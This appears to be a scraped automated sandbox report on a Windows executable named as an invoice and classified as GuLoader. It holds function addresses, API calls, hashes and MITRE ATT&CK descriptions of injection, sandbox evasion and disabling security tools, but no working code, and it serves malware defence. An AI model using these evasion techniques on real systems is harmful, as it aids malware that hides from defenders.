API String ID: 2714655100-0
Opcode ID: bb1981a44285f9cc2671324ada056feb5c02bec7f5d940b9a09129e5d3e55d24
Instruction ID: b950e8b8fbdeed2691461a3c114c2377ba8f3e5f8525c2c9f901b0b8d53092f6
Opcode Fuzzy Hash: bb1981a44285f9cc2671324ada056feb5c02bec7f5d940b9a09129e5d3e55d24
Instruction Fuzzy Hash: BF4136B49003499FCB01CF99C484BAEBBF9FB88364F14845CE519AB321D735A841CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C21310, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32(000000FE,00000000), ref: 00C21378

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: 536b0533ee14f5a61dd48c1b9c4ed01c3f56c61271f478233c9ad539dd080319
Instruction ID: fbaa465de22a4eb0a4a65b7e554cf13b5ff61b64cc17cc6aad1442245258b3d5
Opcode Fuzzy Hash: 536b0533ee14f5a61dd48c1b9c4ed01c3f56c61271f478233c9ad539dd080319
Instruction Fuzzy Hash: AE115B70200354AFDB205F54DED5B9A73969F2A760F790344ED22479F2D335C980C521

Uniqueness

Uniqueness Score: -1.00%

Function 1D9E6D73, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D9E6DFF

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6792fbc1a13900fa04ec367931c59288db2d3812d55e0051fa043234db5afc6c
Instruction ID: bc9f9d8a9c86c294f4c3d6827b57e48fd19e407afc646ca852f107658b3d27a7
Opcode Fuzzy Hash: 6792fbc1a13900fa04ec367931c59288db2d3812d55e0051fa043234db5afc6c
Instruction Fuzzy Hash: 7A21E3B5900348AFDB10CFA9D484ADEBBF9FF48324F14841AE914A7750D379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D9E6D78, Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1D9E6DFF

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 58672cb7c72f86ffd49f4ef1ca858ba3174055af0bbec3e1c984809ade7d78d8
Instruction ID: 83c18ba19d6be05ce033f86e76f8949527e9879fb71ae87cb117113c77781ea3
Opcode Fuzzy Hash: 58672cb7c72f86ffd49f4ef1ca858ba3174055af0bbec3e1c984809ade7d78d8
Instruction Fuzzy Hash: D621E2B5900248AFDB10CFA9D884ADEBBF8FB48324F14841AE914A7350D379A954CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1D9EBDE9, Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1D9EBE72

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: c565bc6b1de3375f4dc0c5ae0cf0ae0867985a0ca33a71d44829ead347fd1845
Instruction ID: 4ab98ae3635ac1a29de0320abf46aad93e65db24023614f8edebf640cb292172
Opcode Fuzzy Hash: c565bc6b1de3375f4dc0c5ae0cf0ae0867985a0ca33a71d44829ead347fd1845
Instruction Fuzzy Hash: 1F219A718057868FDB12CFA8C44479EBBF4FB05358F04852ED449A7641C3796509CFA3

Uniqueness

Uniqueness Score: -1.00%

Function 1D9EBDF8, Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 1D9EBE72

Memory Dump Source

Source File: 00000003.00000002.499140021.000000001D9E0000.00000040.00000001.sdmp, Offset: 1D9E0000, based on PE: false

Similarity

API ID: EncodePointer
String ID:
API String ID: 2118026453-0
Opcode ID: 2eef17b47f4b6280a034a00d42d3bc2b6a226ecc8851d613cc93d25c66469158
Instruction ID: ae43d315b4a484ab9c8c25e8e9161525e6efd88354bc41eaa164686d55bb9241
Opcode Fuzzy Hash: 2eef17b47f4b6280a034a00d42d3bc2b6a226ecc8851d613cc93d25c66469158
Instruction Fuzzy Hash: 91119AB090034A8FCB12CFA9C44479EBBF4FB45358F14842DD409A3700D7796409CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00C22DF8, Relevance: 1.5, APIs: 1, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(?,321C9581,?,00C233F2,00C216EA,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C22E54

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 62a6e969ee2f3439223e48e20a29eaaa1637d535b99f1aea5ab7f932c6883782
Instruction ID: 138d8cb73911a2cd3da57f07c1a62a4d03f21ccce1032c2a13a32963cc7c75a9
Opcode Fuzzy Hash: 62a6e969ee2f3439223e48e20a29eaaa1637d535b99f1aea5ab7f932c6883782
Instruction Fuzzy Hash: A5F0E59020023978CF243B747EA6FBF21288F12BA6F61462DFC61D5857C764CD8AB562

Uniqueness

Uniqueness Score: -1.00%

Function 00C21EAD, Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00C21E7F,00C21F08), ref: 00C21ECD

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 149643b8519a4cfcf6f62cecd3be66349b1b42dacdf96ba07e920091ad7a6972
Instruction ID: 441531280641675509684cd6cc520a08bcb1da5639f349791ef802f74c022b4d
Opcode Fuzzy Hash: 149643b8519a4cfcf6f62cecd3be66349b1b42dacdf96ba07e920091ad7a6972
Instruction Fuzzy Hash: 4AD01230780304F6F6344920AD2BFD622168B90F44E50400EBF0A2D1C241E36950C515

Uniqueness

Uniqueness Score: -1.00%

Function 1D65D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.498579532.000000001D65D000.00000040.00000001.sdmp, Offset: 1D65D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8094b3b16c4bfd24b761e20a2c239ab7596c9385553844ab6165579a9323b0e2
Instruction ID: a5918aa40dde8b3ee190c780977d44c945e5e5cce3a7ed4ed133c7d6c4ecde20
Opcode Fuzzy Hash: 8094b3b16c4bfd24b761e20a2c239ab7596c9385553844ab6165579a9323b0e2
Instruction Fuzzy Hash: 7121F575504240DFDB01CF18D9C0B16BB65FB98754F20CA6DE8494B386C33AD887CAA2

Uniqueness

Uniqueness Score: -1.00%

Function 1D65D005, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.498579532.000000001D65D000.00000040.00000001.sdmp, Offset: 1D65D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1dc2f48e7e5c1730fd3c908c57c9d42ff09907a2c5b0de955525e616e4c4a65
Instruction ID: e0ee757a35d495320f1d2dbc18f5120bc6104550f87b146b24d0a2e3d094eb6d
Opcode Fuzzy Hash: f1dc2f48e7e5c1730fd3c908c57c9d42ff09907a2c5b0de955525e616e4c4a65
Instruction Fuzzy Hash: 522183755083C09FC702CF24D994B15BF71EB4A214F28C6DAD8498B297C33A9857CB62

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00C216D0, Relevance: .3, Instructions: 283COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6355b343641d5635083da500a24ba02b22bb3a413f6820bfda786848ed414bf2
Instruction ID: e187417c0b3fae4e8ec6c53a9849b071398ec07ce320ad921b442488c9b21595
Opcode Fuzzy Hash: 6355b343641d5635083da500a24ba02b22bb3a413f6820bfda786848ed414bf2
Instruction Fuzzy Hash: 56A1EFB1740349BFEF215E10DC96BDA3B62FF15784F144128FE886B581C7B99998AB40

Uniqueness

Uniqueness Score: -1.00%

Function 00C233E3, Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 0cc25863756890789fd57fa40fa0207d5a298bc025e640e231334bcb24884fc8
Instruction ID: 3d20619d32bf16cd43d7ad80bfe8184b506b9f88bcc916eba748768414e4f0b6
Opcode Fuzzy Hash: 0cc25863756890789fd57fa40fa0207d5a298bc025e640e231334bcb24884fc8
Instruction Fuzzy Hash: 00911870A043A19FDB21CF38D4D4755BBD1AF62320F54C2ADD5A68B6D6D3788A82C712

Uniqueness

Uniqueness Score: -1.00%

Function 00C233FD, Relevance: .2, Instructions: 152COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: db935ecaea1fc88e524685674f26d109a21ed454fd89c34b7a7caac2f0647ee3
Instruction ID: 703bff3ee0872458067546b11716fa1de4fe46d88ea11207de1fd1f040fc82a4
Opcode Fuzzy Hash: db935ecaea1fc88e524685674f26d109a21ed454fd89c34b7a7caac2f0647ee3
Instruction Fuzzy Hash: 1D5105706043928FDB25CF28D8D4B55BBD1AF13320F58C2A9D5A54F6E6D379CA42C722

Uniqueness

Uniqueness Score: -1.00%

Function 00C231D9, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 12df2c3139b28c9c28275bedd3e6aeb749455dd2dc5c562a019df8149bcca27b
Instruction ID: 6ac685c08a9dd9cdc9b13330ec1f8529a88351e3f90e9b7932b2bc8d691239e8
Opcode Fuzzy Hash: 12df2c3139b28c9c28275bedd3e6aeb749455dd2dc5c562a019df8149bcca27b
Instruction Fuzzy Hash: 5C315675A483A2CFE7225F64A89A3887B91BF13710FA94195C4818F5D3D36E8BC5CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00C2323A, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c0e7bbaacfa80585e393a3360adfce1dd954f20bcc6e097aa897b1d1460fbd0
Instruction ID: 9003c82affeb73d4b1cea63eef4eb9161c235bcaf9fc2ac38399fed7ed4cf42a
Opcode Fuzzy Hash: 6c0e7bbaacfa80585e393a3360adfce1dd954f20bcc6e097aa897b1d1460fbd0
Instruction Fuzzy Hash: B81184359443A2DFE7626F24994B3C87795BF03710F99405088514B597E36D8FC48B82

Uniqueness

Uniqueness Score: -1.00%

Function 00C23314, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ca4182dd3f43d1528cf0da1499bbcec55f6e885519bdb3782160d939f75fc4
Instruction ID: e26ce8e6aaa7852493ff8cab0f40a0e91d201c44d20e6102b07465dae57df9b7
Opcode Fuzzy Hash: 66ca4182dd3f43d1528cf0da1499bbcec55f6e885519bdb3782160d939f75fc4
Instruction Fuzzy Hash: 711129387083938FC720CA6CD4D03A6A392FF5A710BA95168E886CB666DA64CE468705

Uniqueness

Uniqueness Score: -1.00%

Function 00C22FBC, Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 469101a949f8a4b4d87740d2c4b4d332390fb7f736e050a601f687ea224f2082
Instruction ID: e76d6883f1468c1dfeb5d6487d711525e63024f82889730e22a07068e30c602e
Opcode Fuzzy Hash: 469101a949f8a4b4d87740d2c4b4d332390fb7f736e050a601f687ea224f2082
Instruction Fuzzy Hash: 7AF0A0753506618FCB25EA28D1D0EA573A1EF29740FC04566E587DBEA1C738ED80D622

Uniqueness

Uniqueness Score: -1.00%

Function 00C21BF5, Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a443bac6b340187a8f25e1aa1044b39b3bfa56b39926519bac1070aa7523372
Instruction ID: 22cd2778f6c340f57364c5448751bccb86ab1eb8484d35615a4d22be282baec7
Opcode Fuzzy Hash: 2a443bac6b340187a8f25e1aa1044b39b3bfa56b39926519bac1070aa7523372
Instruction Fuzzy Hash: 31C04CB22005818FEF41DA0CD4D2B8173A1AB15684B180490E442CB611D315ED04CA00

Uniqueness

Uniqueness Score: -1.00%

Function 00C22D7E, Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.491326318.0000000000C21000.00000040.00000001.sdmp, Offset: 00C21000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8188d26843b81a93368bc2ef77995b7d3cd1d3b174a048cb3e7c59e48aed99ac
Instruction ID: 4d51c5bc94cbfdaa307f6fd05d1d947627a33990e848442386e4396a16ab94d9
Opcode Fuzzy Hash: 8188d26843b81a93368bc2ef77995b7d3cd1d3b174a048cb3e7c59e48aed99ac
Instruction Fuzzy Hash: F1C09231B299918FD381DE08C1D0FC0B3A5BB41B80FC644A8E5968BAA6C36CED808B40

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report faktura_ODfk0021.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTPS Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

Function 004015B4, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 270
COMMONCrypto

Function 0040E313, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 131
COMMON

Function 00408314, Relevance: 16.8, APIs: 11, Instructions: 266
COMMON

Function 0040EACD, Relevance: 56.3, APIs: 30, Strings: 2, Instructions: 328
COMMON

Function 0040DB29, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 158
COMMON

Function 0040E1B6, Relevance: 26.3, APIs: 14, Strings: 1, Instructions: 98
COMMON

Function 0040F564, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128
COMMON

Function 0040DFAA, Relevance: 21.1, APIs: 14, Instructions: 145
COMMON

Function 0040E52D, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 91
COMMON

Function 0040F3A4, Relevance: 19.6, APIs: 13, Instructions: 116
COMMON

Function 0040E6E3, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 138
COMMON

Function 0040F02B, Relevance: 18.1, APIs: 12, Instructions: 103
COMMON

Function 0040E97C, Relevance: 16.6, APIs: 11, Instructions: 93
COMMON

Function 0040DD8A, Relevance: 12.1, APIs: 8, Instructions: 97
COMMON

Function 0040F1A0, Relevance: 12.1, APIs: 8, Instructions: 96
COMMON

Function 0040F73E, Relevance: 10.6, APIs: 7, Instructions: 69
COMMON

Function 0040DF21, Relevance: 6.0, APIs: 4, Instructions: 46
COMMON

Function 0040E8E0, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON